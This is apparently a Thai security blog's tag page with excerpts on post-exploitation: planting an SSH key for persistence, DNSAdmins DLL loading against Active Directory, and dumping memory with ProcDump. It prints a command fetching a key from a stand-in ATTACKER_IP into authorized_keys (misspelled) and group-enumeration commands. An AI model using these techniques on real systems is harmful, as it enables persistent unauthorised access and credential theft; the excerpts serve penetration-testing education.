Posts by tag
post exploitation
ก่อนหน้านี้เราพูดถึงการทำ Privilege Escalation ด้วย sudo และ exploit path กันมาแล้ว วันนี้ก็เลยเอาอันอื่นๆที่จำเป็นเมื่อทำ post exploitation ใน Linux มารวมไว้ครับ 1. Add public key ไว้ใน authorised key เพื่อให้สามารถ login ได้
2. การรัน shell ผ่านคำสั่งต่างๆ…
1 |
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys |
Ankit Joshi ซึ่งเป็น security คนหนึ่งได้พบว่าหาก user ใดๆที่เป็น DNS Admin สามารถใช้คำสั่งเพื่อทำการ load dll ใดๆก็ได้บน Windows Active Directory Server ซึ่งเมื่อดัดแปลงการโหลดแล้วจะทำให้สามารถยึดเครื่องหรือทำสิ่งใดๆจากเครื่อง AD ได้ 1. list user ที่เป็น dns admin user
2. Login…
1 2 3 4 |
net localgroup dnsadmins /domain หรือ import-module activedirectory get-adgroupmember -Identity "DNSAdmins" |
SysInternal Suite ถือเป็นกลุ่มของเครื่องมือที่ใช้ประโยชน์ได้หลายอย่างมากสำหรับ admin แต่ก็มีความเป็นไปได้ที่จะใช้ในทางอื่นเช่นกัน ในบทความนี้เป็นเรื่องของ Post-Exploitation (หลังจากยึดเครื่องได้แล้ว) โดยเราจะใช้ ProcDump ซึ่งเป็นเครื่องมือสำหรับการ monitor application ที่ทำให้ CPU ขึ้นสูงและสร้าง dump ของ memory ที่ crash เพื่อดูว่าปัญหาเกิดจากอะไร. แทนที่เราจะใช้ไปในการดู memory ของ Application ที่ผิดพลาด ก็กลายเป็น dump memory…
Recent Comments